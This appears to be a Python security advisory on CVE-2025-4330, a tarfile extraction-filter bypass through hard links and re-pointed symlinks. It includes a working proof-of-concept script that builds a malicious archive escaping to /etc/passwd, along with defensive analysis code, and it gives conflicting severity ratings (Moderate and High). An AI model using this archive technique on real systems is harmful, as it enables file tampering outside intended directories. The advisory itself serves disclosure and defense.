
Python Tar Filter Bypass Vulnerability

High
rcorrea35 published GHSA-7fj8-pjw2-r9vh Jul 31, 2025

Package

No package listed

Affected versions

Python 3.8.17+, 3.9.17+, 3.10.12+, 3.11.4+, and 3.12+ (the releases that introduced PEP 706 extraction filters)

Patched versions

None

Description

Summary

Python's TarFile.extractall() and TarFile.extract() methods accept a filter argument (added by PEP 706) that makes extraction safer by validating or modifying each archive member before it is written to disk.

A bug in how links are processed allows the filter to be bypassed in some limited cases, and allows objects to be created in directories other than their intended location.

The bypass is triggered when a hard link is being created that points to a file that does not exist. The existence of a file can be manipulated by changing a symlink during extraction.

The bypass does not affect validation of the hard link's own path, but it does affect any other validation the filter may perform, such as excluding file types or changing modes.

Severity

Moderate - Should be fixed, but not serious in nature.

1. Create the tar file

Run the following Python code to create a tar file that demonstrates the vulnerability. When extracted, this archive creates a symlink that bypasses the filter's symlink destination check.

import tarfile
with tarfile.open("poc-hardlink-bypass.tar", mode="x:") as tar:
    # Create a deep directory tree so that, while "c" points into it, the c/escape symlink target still resolves inside the destination
    a = tarfile.TarInfo("a/t/t/t/t/t/t/t/t/t/t/dummy")
    a.size = 0
    a.type = tarfile.REGTYPE
    tar.addfile(a)
    # Create a dummy file so that the "b" directory exists
    b = tarfile.TarInfo("b/dummy")
    b.size = 0
    b.type = tarfile.REGTYPE
    tar.addfile(b)
    # Point "c" to the bottom of the tree in "a"
    ca = tarfile.TarInfo("c")
    ca.type = tarfile.SYMTYPE
    ca.linkname = "a/t/t/t/t/t/t/t/t/t/t"
    tar.addfile(ca)
    # Create a symlink. At this point the link should point to a non-existent location under "a"
    cescape = tarfile.TarInfo("c/escape")
    cescape.type = tarfile.SYMTYPE
    cescape.linkname = "../../../../../../../../etc/passwd"
    tar.addfile(cescape)
    # Move "c" to point to "b". This means "c/escape" no longer exists.
    cb = tarfile.TarInfo("c")
    cb.type = tarfile.SYMTYPE
    cb.linkname = "b"
    tar.addfile(cb)
    # Attempt to create a hard link to "c/escape". Since that path no longer
    # exists, tarfile instead extracts the "c/escape" symlink member directly
    # at "boom", without the filter, so its traversal escapes the destination path.
    boom = tarfile.TarInfo("boom")
    boom.type = tarfile.LNKTYPE
    boom.linkname = "c/escape"
    tar.addfile(boom)

2. Extract the tar file

Change into a new directory (e.g. mkdir poc; cd poc) and run the following in Python to extract the tar file created above.

import tarfile
tarfile.open("../poc-hardlink-bypass.tar", mode="r").extractall(".", filter="data")
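To confirm the result, a small helper can check whether an extracted entry resolves outside the extraction directory. `escapes_destination` is a hypothetical helper written for illustration; it relies on os.path.realpath, which follows every symlink along the path, including a symlink at the entry itself.

```python
import os


def escapes_destination(dest: str, name: str) -> bool:
    """Hypothetical helper: True if dest/name resolves outside dest.

    os.path.realpath follows symlinks, so a link such as
    boom -> ../../../../../../../../etc/passwd is resolved to its target.
    """
    dest_real = os.path.realpath(dest)
    target_real = os.path.realpath(os.path.join(dest, name))
    return os.path.commonpath([dest_real, target_real]) != dest_real


# Run from the poc directory after the extraction step above.
print(os.path.islink("boom"), escapes_destination(".", "boom"))
```

On an affected version, the analysis in this advisory implies both values are True, because "boom" is a symlink whose target lies outside the destination.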

Further Analysis

When a hard link is extracted from a tar archive using extractall() or extract(), TarFile.makelink() is called.

Before calling os.link() to create the hard link, it checks whether the link target exists by calling os.path.lexists().
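Because this check is a plain path lookup, its answer can be changed purely by re-pointing an intermediate symlink. The sketch below reproduces that effect in a scratch directory with a simplified layout (`a/deep` stands in for the PoC's `a/t/t/...` tree, and `demo_lexists_manipulation` is a hypothetical name). Once "c" is re-pointed from the "a" tree to "b", os.path.lexists("c/escape") flips from True to False even though the escape link itself still exists under a/deep. It assumes a POSIX system where os.symlink is permitted.

```python
import os
import tempfile


def demo_lexists_manipulation(root: str):
    """Hypothetical demo: returns (exists_before, exists_after) for c/escape."""
    os.makedirs(os.path.join(root, "a", "deep"))
    os.makedirs(os.path.join(root, "b"))
    c = os.path.join(root, "c")
    os.symlink(os.path.join("a", "deep"), c)  # c -> a/deep
    # Creating c/escape really creates a/deep/escape (a dangling symlink).
    os.symlink("dangling-target", os.path.join(c, "escape"))
    before = os.path.lexists(os.path.join(c, "escape"))
    # Re-point c at b, like the second "c" member in the PoC archive.
    os.unlink(c)
    os.symlink("b", c)
    after = os.path.lexists(os.path.join(c, "escape"))
    return before, after


with tempfile.TemporaryDirectory() as tmp:
    print(demo_lexists_manipulation(tmp))  # (True, False)
```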

If the link target does not exist, rather than creating the link target and then hard-linking to it, makelink() looks up the link target member with TarFile._find_link_target() and extracts it directly with TarFile._extract_member() at the path where the hard link would have been created.

This call to TarFile._extract_member() does not pass the member through the filter.

This means that by carefully crafting the link target member in the tar file, an attacker can bypass security controls.
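Putting the existence check and the fallback together, the hard-link branch described above behaves roughly like the following model. This is a hypothetical simplification written for illustration, not CPython's makelink(); the `extract_target_unfiltered` callback stands in for TarFile._extract_member() being called on the link target member.

```python
import os
from typing import Callable


def extract_hardlink_sketch(dest: str, link_name: str, link_target_name: str,
                            extract_target_unfiltered: Callable[[str], None]) -> str:
    """Hypothetical, simplified model of the hard-link branch of makelink().

    Returns "hardlink" when a real hard link is created and "fallback" when
    the link target member is extracted in place of the hard link.
    """
    link_target_path = os.path.join(dest, link_target_name)
    link_path = os.path.join(dest, link_name)
    if os.path.lexists(link_target_path):
        # Normal case: the target is already on disk, so hard-link to it.
        os.link(link_target_path, link_path)
        return "hardlink"
    # Fallback: the target member is written directly at link_path.
    # Nothing on this branch consults the extraction filter.
    extract_target_unfiltered(link_path)
    return "fallback"
```

In the PoC, the fallback writes the "c/escape" symlink member at "boom", which is how the unchecked traversal ends up in the destination directory.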

Reaching TarFile._find_link_target() through a hard link is not straightforward. The search for the link target is restricted to the members that appear before the hard link in the tar file, so when extractall() is used, the link target member has already been processed and must itself be extractable without error. This is not required if extract() is used.
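The ordering restriction can be modelled with a short sketch. `find_link_target_sketch` is a hypothetical helper that only approximates the search described above: it compares names directly and skips any path normalisation, scanning backwards through the members that precede the hard link.

```python
import tarfile
from typing import List, Optional


def find_link_target_sketch(members: List[tarfile.TarInfo],
                            link: tarfile.TarInfo) -> Optional[tarfile.TarInfo]:
    """Hypothetical model: return the closest member before `link`
    whose name matches link.linkname, or None if there is none."""
    index = members.index(link)
    # Only members that appear *before* the hard link are searched,
    # newest first, so a later duplicate name wins over an earlier one.
    for candidate in reversed(members[:index]):
        if candidate.name == link.linkname:
            return candidate
    return None


# PoC-like members: the "c/escape" symlink precedes the "boom" hard link.
escape = tarfile.TarInfo("c/escape")
escape.type = tarfile.SYMTYPE
escape.linkname = "../../../../../../../../etc/passwd"
boom = tarfile.TarInfo("boom")
boom.type = tarfile.LNKTYPE
boom.linkname = "c/escape"
print(find_link_target_sketch([escape, boom], boom) is escape)  # True
```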

This technique cannot be used to create a hard link outside of the destination path. Creating a hard link depends on TarInfo._link_target being set, but this attribute is only set in TarFile._get_extract_tarinfo(), which is not called on this code path.

Timeline

Date reported: 2025-05-02
Date fixed:
Date disclosed: 2025-07-31

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
7.5 / 10

CVSS v3 base metrics

Attack vector: Network
Attack complexity: Low
Privileges required: None
User interaction: None
Scope: Unchanged
Confidentiality: None
Integrity: High
Availability: None

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
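The vector string above can be cross-checked against the base score using the CVSS v3.1 base-score equations. The sketch below implements those equations for base metrics only, using the metric weights and Roundup function from the FIRST CVSS v3.1 specification; `base_score` and `roundup` are names chosen here, and temporal and environmental metrics are ignored.

```python
import math

# CVSS v3.1 base-metric weights (FIRST CVSS v3.1 specification).
AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}


def roundup(value: float) -> float:
    """CVSS v3.1 Roundup: smallest one-decimal number >= value."""
    int_input = round(value * 100000)
    if int_input % 10000 == 0:
        return int_input / 100000.0
    return (math.floor(int_input / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    # Skip the "CVSS:3.1" prefix and parse "AV:N", "AC:L", ... into a dict.
    parts = dict(item.split(":") for item in vector.split("/")[1:])
    changed = parts["S"] == "C"
    iss = 1 - (1 - CIA[parts["C"]]) * (1 - CIA[parts["I"]]) * (1 - CIA[parts["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    pr = (PR_CHANGED if changed else PR_UNCHANGED)[parts["PR"]]
    exploitability = 8.22 * AV[parts["AV"]] * AC[parts["AC"]] * pr * UI[parts["UI"]]
    if impact <= 0:
        return 0.0
    if changed:
        return roundup(min(1.08 * (impact + exploitability), 10))
    return roundup(min(impact + exploitability, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"))  # 7.5
```

For this vector, impact is 6.42 × 0.56 ≈ 3.60 and exploitability is 8.22 × 0.85 × 0.77 × 0.85 × 0.85 ≈ 3.89; their sum of about 7.48 rounds up to 7.5, which falls in the High band.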

CVE ID

CVE-2025-4330

Weaknesses

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.

Credits